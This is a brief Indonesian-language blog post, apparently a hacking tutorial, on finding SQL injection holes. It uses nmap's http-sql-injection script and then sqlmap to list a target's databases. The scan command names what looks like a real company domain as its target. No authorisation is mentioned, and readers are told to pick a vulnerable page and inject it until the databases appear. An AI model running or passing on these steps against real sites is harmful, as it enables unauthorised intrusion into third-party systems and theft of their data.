Di kesempatan kali ini saya akan kasih tutor mencari celah SQL Injection menggunakan nmap [GET]
Untuk yang POST Method tunggu di next artikel.
Oke yang perlu kalian persiapkan adalah
- Termux yang sudah diinstall nmap & sqlmap
- Target
- Koneksi internet
command nya bisa ikutin kaya ss dibawah ini.
$ nmap -T4 -sV --script http-sql-injection kabelindo.co.id -v
Nah kalo udah jadi kek gini ,pilih ae salah satu buat di inject. (kalo ganongol berarti emang gada ya)
$ sqlmap -u "http://site.com/index.php?id=1" --dbs
Nah tinggal tunggu deh sampe nongol databasenya kek ss dibawah ini
OK Sekian tutor dari saya semoga bermanfaat dan bisa dipahami.
Komentar
Posting Komentar